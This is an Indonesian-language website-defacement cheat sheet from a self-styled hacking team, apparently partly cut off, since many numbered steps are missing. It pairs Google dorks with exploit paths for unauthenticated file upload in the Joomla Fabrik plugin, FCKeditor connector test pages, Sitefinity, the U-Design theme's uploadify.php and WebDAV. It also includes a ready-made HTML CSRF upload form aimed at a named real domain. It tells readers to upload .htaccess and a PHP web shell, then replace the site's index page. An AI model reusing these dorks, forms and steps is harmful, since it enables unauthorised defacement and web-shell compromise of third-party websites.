X-4R4Y
1. Deface Poc Bypass Admin
Dork : inurl:/?mnux=login
(kembangin Lagi Yaa)
Done .
Deface Poc Webdav
2. Buka Webdav
3. Klik Webdav
5. Klik Setting
8. Klik Oke
Dork : "File Upload Manager v1.3" "rename to" "file types allowed"
(kalian Kembangkan Lagi)
1. dorking di google
Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
Exploit :
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=a
jax_upload
Contoh :
www.target.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileu
pload&method=ajax_upload
<title>~ACT~</title>
<center> <body><img alt="Gambar Koala" src="https://4.bp.blogspot.com/-
9PXpouwGn2A/Wmfq3SmQT9I/AAAAAAAAAAg/ZqsgdcxDL74SbN2oiOFmFbuo-
9ma9wSSQCPcBGAYYCw/s1600/IMG-20180122-WA0030.jpg"/>
<br>
<br>
<font size="10">CSRF ASSASSIN CYBER TEAM </h1><br><br>
<form method="POST" action=" Di sini Link Website atau Domain
Website/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&m
ethod=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button>Upload</button>
</form>
</center><br></font>
Contoh :
<title>~ACT~</title>
<center> <body><img alt="Gambar Koala" src="https://4.bp.blogspot.com/-
9PXpouwGn2A/Wmfq3SmQT9I/AAAAAAAAAAg/ZqsgdcxDL74SbN2oiOFmFbuo-
9ma9wSSQCPcBGAYYCw/s1600/IMG-20180122-WA0030.jpg"/>
<br>
<br>
<font size="10">CSRF ASSASSIN CYBER TEAM </h1><br><br>
<form method="POST"
action="http://www.portofcall.com/index.php?option=com_fabrik&format=raw&task=plugin.plugi
nAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button>Upload</button>
</form>
</center><br></font>
5. Buka File csrf Nya , Lalu Upload .htaccess yang ada di file , Lalu Back Kehalaman Yang Tadi , Lalu
Upload Shell.php Mu
6. Sudah Terupload Saat Nya Tebas Index
Dork : inurl:examples/uploadbutton.html
(kembangin Lagi)
1. Dorking Google
3. Klik Upload
5. Lalu Oke
Dork : inurl:”/html/siswa.php?”
Inurl:”/html/guru.php?”
Inurl:”/html/alumni.php?”
1. Dorking Google
3. Masukan Exploit
/editor/filemanager/connector/test.html
Atau
/editor/filemanager/connector/uploadtest.html
4. Tinggal Upload
Upload Extensi (txt,jpg,png,jpeg,dll)
3. Masukan Exploit
/sitefinity/UserControls/dialog/DocumentEditorDialog.aspx
6. Klik Oke
Done Eaa :v
Deface Poc U-Design Themes
Dork : inurl:themes/u-design/ext:jpgimage
indexof/''''uploadify.php''''wp-content
Exploit : :/wp-content/themes/u-design//scripts/admin/uploadify/uploadify.php
1. Dorking Di Google
8. lalu Ada our Bitch buka link itu Jika ada Angka 1 Shell Kalian Sudah teruploud